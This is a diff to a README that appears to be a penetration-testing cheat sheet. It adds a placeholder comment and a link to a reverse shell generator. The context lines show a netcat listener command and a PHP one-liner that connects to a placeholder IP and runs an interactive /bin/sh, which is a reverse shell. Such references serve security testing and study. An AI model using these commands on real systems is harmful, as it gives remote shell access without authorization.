diff --git a/README.md b/README.md
index 49ff89c..1ed6d11 100644
--- a/README.md
+++ b/README.md
@@ -416,9 +416,10 @@ sudo nc –lnvp {PORT}
# {PORT}: Select the port used to listen
```
-
+# {IP ADDRESS}: IP Address of the client from step one (python server)
+
## NC Execute - Server [STEP 2]
```bash
@@ -448,12 +449,16 @@ php -r ‘$sock=fsockopen(“{IP ADDRESS}”,{PORT});exec(“/bin/sh -i <&3 >&3
# {IP ADDRESS}: IP Address of the client from step one (listener)
# {PORT}: Port of the client from step one (listener)
```
+
+## Reverse Shell Generator
+
+
[https://www.revshells.com/](https://www.revshells.com/)
-
+
# Shell Upgrade